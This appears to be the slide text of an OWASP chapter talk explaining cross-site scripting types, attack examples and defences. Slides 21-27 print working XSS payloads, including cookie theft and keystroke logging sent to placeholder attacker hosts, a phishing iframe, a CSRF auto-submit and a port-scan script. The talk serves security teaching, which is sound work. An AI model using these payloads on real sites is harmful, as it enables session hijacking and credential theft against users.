
Cross site scripting attacks and defenses

This presentation covers Cross-Site Scripting attacks and defences in web applications. The talk was delivered as part of an OWASP Hyderabad Chapter meet. Comments and suggestions are welcome.

  1. XSS: Multi-Facet Vulnerability
  2. #whoami: Mohammed Imran (@imran_naseem), Information Security professional @ TCS, Null Hyderabad Chapter Lead, OWASP Hyderabad Board Member
  3. Agenda: 1. Cross Site Scripting; 2. Problem; 3. Anatomy of XSS; 4. Types of XSS; 5. XSS Attacks; 6. Solution
  4. #1 The definition of XSS
  5. “Cross site Scripting (XSS) attacks are a type of injection problem, in which malicious scripts are injected into otherwise benign and trusted websites.” Source: owasp.org
  6. #2 The Problem of XSS
  7. And it's expected ...
  8. If not done securely, could lead to problems
  9. Such as... Malicious Script Execution, Phishing, Redirection to malicious site, Session Hijacking, CSRF, Keylogging, Port Scanning
  10. #3 The Anatomy of XSS
  11. Application takes insecure content
  12. HTML Source Code
  13. #4 The Types of XSS
  14. Reflected XSS
  15. “Reflected attack generally is used to exploit script injection vulnerabilities via URL in a web application.”
  16. Stored XSS
  17. “Stored XSS occurs when the injected script is stored in the database and is delivered to the visitor of the application.”
  18. DOM XSS
  19. “DOM Based XSS is an XSS attack wherein the attack payload is executed as a result of modifying the DOM ‘environment’ in the victim’s browser used by the original client side script, so that the client side code runs in an ‘unexpected’ manner.” Source: owasp.org
  20. #5 The Attack Types in XSS
  21. Redirection: `"><script>document.location.href="http://www.MaliciousSite.com/"</script>`
  22. Session Hijacking: `"><script>document.location.href="http://www.MaliciousSite.com/cookiestealer.php?cookie="+document.cookie</script>`
  23. Phishing: `"><iframe src="http://www.yourphishingsite.com" height="100%" width="100%"></iframe>`
  24. Keylogging: `"><script src="http://www.MaliciousSite.com/keylogger.js"></script>` Logic: `document.onkeypress = function keyLog(a) { new Image().src = "http://www.attacker.com/logging.php?data=" + a.which; }`
  25. Redirection: `"><script>document.location.href="http://www.MaliciousSite.com/"</script>`
  26. CSRF. Page 1: `<form name="delete" action="http://yoursite.com/deleteuser" method="post"><input type="hidden" name="userid" value="1"><input type="submit"></form>` Page 2: `"><script>document.form.delete.submit();</script>`
  27. Port Scanning: `<script type="text/javascript">function handleError(message, url, line) { if (message.match(/Script error|Error loading script/)) { alert("open"); } } var newScript = document.createElement("script"); newScript.src = "http://www.google.com:80/"; document.body.appendChild(newScript); window.onerror = handleError;</script>`
  28. #6 The Solution to fix XSS
  29. Solution: ● Validate the data (use white-listing) ● Encode the data ● Use HTTP-only and Secure flags for cookies
  30. Credits: ● http://www.symantec.com/connect/blogs/getting-sassy ● All icons are from http://thenounproject.com/ ● Owasp.org
